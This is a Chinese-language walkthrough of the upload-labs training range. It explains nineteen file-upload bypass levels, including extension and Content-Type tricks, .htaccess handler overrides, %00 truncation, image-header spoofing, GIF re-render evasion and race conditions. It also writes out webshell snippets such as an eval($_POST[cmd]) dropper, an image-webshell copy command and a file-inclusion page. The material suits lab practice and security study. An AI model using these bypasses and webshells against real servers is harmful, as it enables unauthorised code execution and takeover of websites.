upload-labs通关集

环境

windows,phpstudy,PHP版本5.2.17
在这里插入图片描述

第一题 前端js检查

上传小马,出现 在这里插入图片描述查看源码
在这里插入图片描述这里是通过前端js检查
我们可以先将文件后缀改为.jpg
然后用bp抓包,在将.jpg改为.php
在这里插入图片描述 这里也可以禁用js

第二题 content-type类型绕过

查看源码
在这里插入图片描述发现只检查content-type,于是将content-type改为image/.jpg绕过
在这里插入图片描述

第三题 黑名单绕过

查看源码
在这里插入图片描述 可以看到代码使用黑名单来过滤
这里可以上传后缀为php3,pht,phtml,php5,phps等来绕过(它们会被解析为php)

前提是apache的httpd.conf中有如下配置代码

AddType application/x-httpd-php .php .phtml .phps .php5 .pht

其他语言也有类似的情况,改后缀名上传即可:
在这里插入图片描述
由于我这里使用的是phpstudy+windows,由于配置原因是解析不了php3等等这些后缀的

第四题 .htaccess绕过

查看源码还是黑名单
在这里插入图片描述几乎过滤了所有有问题的后缀名,除了.htaccess(apache的配置文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。),于是
先上传一个.htaccess内容如下的文件:

<FilesMatch "2.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

.htaccess文件的内容的意思是 对2.jpg使用php重新解析
然后再上传jpg的图片马,

也可以

SetHandler application/x-httpd-php

它会把所有上传文件当成php来解析

注意
启用.htaccess,需要修改httpd.conf,启用AllowOverride(将该值改为all)
在这里插入图片描述 连接
在这里插入图片描述

第五题 大小写绕过

查看源码
在这里插入图片描述所有的都被过滤
但是可以发现,本题去掉了大小写绕过的逃逸。
直接上传.PHp。。

第六题 空格绕过

对比第五题的源码可以发现,本题源码少了
在这里插入图片描述那么我们可以上传PHP文件,然后使用burp suit抓包修改后缀名格式为php加空格绕过。
在这里插入图片描述

第七题 点绕过

查看源码发现少了在这里插入图片描述可以在后缀中加点绕过
在这里插入图片描述

第八题 ::$DATA绕过

查看源码,少了
在这里插入图片描述
在php+windows的情况下:如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$DATA"之前的文件名。
可在后缀名中加” ::$DATA”绕过:
在这里插入图片描述然后能够直接访问成功即可
在这里插入图片描述

第九题 只过滤了一次且对后缀没有重命名的绕过

在这里插入图片描述从源代码可以看出前几题的绕过方式全部被修复了。
程序先是去除文件名前后的空格,再去除文件名最后所有的点, 再通过strrchar来寻找.来确认文件名的后缀,但是最后保存文件的时候没有重命名而是使用处理后的文件名(红线的那一行表示路径拼接的是处理后的文件名)

可以利用4.php. .(两个点号之间有一个空格)绕过,
(也就是这个上传只过滤一次关键字。)
在这里插入图片描述

第十题 双写绕过

在这里插入图片描述将非法后缀替换为空
于是可以利用双写绕过:
直接将后缀改为.pphphp上传。。
上传之后会变成.php

第十一题 get型%00截断

在这里插入图片描述这一题并没有对我们上传的文件进行处理,但会对我们保存的路径进行处理,也就是我们上传后的文件名会被重命名
又发现有一个get传递的参数,save_path,这是我们可控的一个参数,于是可以尝试%00截断
使用%00截断,需要两个条件
(1)php版本小于5.3.4
(2)php的magic_quotes_gpc为OFF状态
在这里插入图片描述在这里插入图片描述上传一个7.jpg抓包在令save_path=…/upload/7.php%00
这里可能是其它配置原因报错了。。
在这里插入图片描述后来又试了一下在phpstudy-其他选项-php扩展即设置-参数开关设置-把magic_quotes_gpc关了
突然发现可以上传了
在这里插入图片描述

第十二题 post型%00截断

发现只是get变成了post,还是利用00截断,但这次需要在二进制中进行修改,因为post不会像get对%00进行自动解码。
在这里插入图片描述先在upload/后面加8.php+
在这里插入图片描述然后找到加号对应的二进制在这里插入图片描述成功上传
在这里插入图片描述

第十三题 文件头检查

在这里插入图片描述这里主要是取上传文件的头两个字节判断文件类型,因此直接上传图片马即可,制作方法:
copy 1.jpg /b + 1.php /a 2.jpg
然后上传
在这里插入图片描述之后可以通过文件包含漏洞来利用
比如我们可以upload目录下写一个include.php文件

<?php
$file = $_GET[ 'page' ];
include($file);
?>

能正常访问即可(图片中隐藏的一句话木马此时已经运行)
在这里插入图片描述包含这个页面后,会看到很多乱码,这些都是jpg文件的内容,当然在页面上是看不到一句话木马的语句的,因为已经被解析为php代码在后端运行的,不会显示在页面上。

然后就可以使用菜刀来连接木马在这里插入图片描述

第十四题 突破getimagesize

在这里插入图片描述这里用getimagesize获取文件类型,还是直接就可以利用图片马就可进行绕过:
getimagesize知识点
array getimagesize ( string KaTeX parse error: Expected 'EOF', got '&' at position 19: …ename [, array &̲imageinfo ] )

getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型和一个可以用于普通 HTML 文件中 IMG 标记中的 height/width 文本字符串。

如果不能访问 filename 指定的图像或者其不是有效的图像,getimagesize() 将返回 FALSE 并产生一条 E_WARNING 级的错误。

因此$info[2]指的是文件的类型

这里我是添加GIF图片的文件头GIF89a,绕过GIF图片检查。
先上传22.php在加GIF98a
在这里插入图片描述

第十五题 突破exif_imagetype

在这里插入图片描述这里用到php_exif模块来判断文件类型,还是直接就可以利用图片马就可进行绕过:
在这里插入图片描述出现报错
在这里插入图片描述解决办法打开php_exif
(1).phpstudy-其他选项-php扩展即设置-php扩展-打开php_exif

(2).如下
1.在php.ini文件中找到;extension=php_exif.dll,去掉前面的分号
2.在php.ini文件中找到;extension=php_mbstring.dll,去掉前面的分号,并将此行移动到extension=php_exif.dll之前,使之首先加载*。
3.找到[exif]段,把下面语句的分号去掉。
;exif.encode_unicode = ISO-8859-15
;exif.decode_unicode_motorola = UCS-2BE
;exif.decode_unicode_intel = UCS-2LE
;exif.encode_jis =
;exif.decode_jis_motorola = JIS
;exif.decode_jis_intel = JIS
重启php

之后就可以成功上传了
在这里插入图片描述

第十六题 二次渲染绕过

在这里插入图片描述imagecreatefrom 系列函数用于从文件或 URL 载入一幅图像,成功返回图像资源,失败则返回一个空字符串。 该系列函数有: imagecreatefromgif():创建一块画布,并从 GIF 文件或 URL 地址载入一副图像
imagecreatefromjpeg():创建一块画布,并从 JPEG 文件或 URL 地址载入一副图像
imagecreatefrompng():创建一块画布,并从 PNG 文件或 URL 地址载入一副图像
imagecreatefromwbmp():创建一块画布,并从 WBMP 文件或 URL 地址载入一副图像
imagecreatefromstring():创建一块画布,并从字符串中的图像流新建一副图像

fileextfileext和filetype是检验是否为gif格式.
然后使用move_uploaded_file()函数来做判断条件,如果成功会将文件移动到$target_path
在这里插入图片描述这里的二次渲染是根据上传的图片生成一个新的图片,然后删除掉原来的图片。

将一句话添加到gif图片的尾部.
在这里插入图片描述把上传后的图片下载到本地后可以发现,我们在gif末端添加的php代码已经被去除.

关于绕过gif的二次渲染,我们只需要找到渲染前后没有变化的位置,然后将php代码写进去,就可以成功上传带有php代码的图片了.

经过对比,蓝色部分是没有发生变化的,
在这里插入图片描述将代码插入到这一段
在这里插入图片描述上传
在这里插入图片描述在查看上传后生成的7665.gif,这里可以看到PHP代码没有被删除,上传成功
在这里插入图片描述详细参考https://xz.aliyun.com/t/2657#toc-18

第十七题 条件竞争

在这里插入图片描述这里是先将文件上传到服务器,然后检测后缀,符合则通过rename修改名称,再通过unlink删除文件,否则直接删除,因此可以通过条件竞争的方式在unlink之前,访问webshell。

这里我是上传一个PHP文件,内容为

<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]);?>');?>

这个可以在我们访问到webshell时在上传目录生成一个带一句话的shell.php

首先在burp中不断发送上传webshell的数据包:
在这里插入图片描述抓包后放入intruder模块中选择发送多次
在这里插入图片描述然后不断在浏览器中访问,会有一瞬间访问成功
在这里插入图片描述这时就会发现upload文件夹下生成了shell.php文件,然后就可以利用了。

第十八题 条件竞争

尝试很久无果后,看了一下其它解题文章

本关对文件后缀名做了白名单判断,然后会一步一步检查文件大小、文件是否存在等等
在这里插入图片描述这里move()在renamefile()前面,也就是先移动到临时目录再重命名,所以同样存在条件竞争漏洞。
在这里插入图片描述条件竞争的绕过和上题差不多,可以不断利用burp发送上传图片马的数据包,由于条件竞争,程序会出现来不及rename的问题,就可以上传成功了

后来发现这题也可以直接上传图片马。。

第十九题 %00截断

也是一个00截断绕过方法于pass12相同
查看源码在这里插入图片描述发现move_uploaded_file()函数中的img_path是由post参数save_name控制的,因此可以在save_name利用00截断绕过:
上传
在这里插入图片描述抓包后修改
在这里插入图片描述

原文地址:https://www.cnblogs.com/lceFIre/p/12430696.html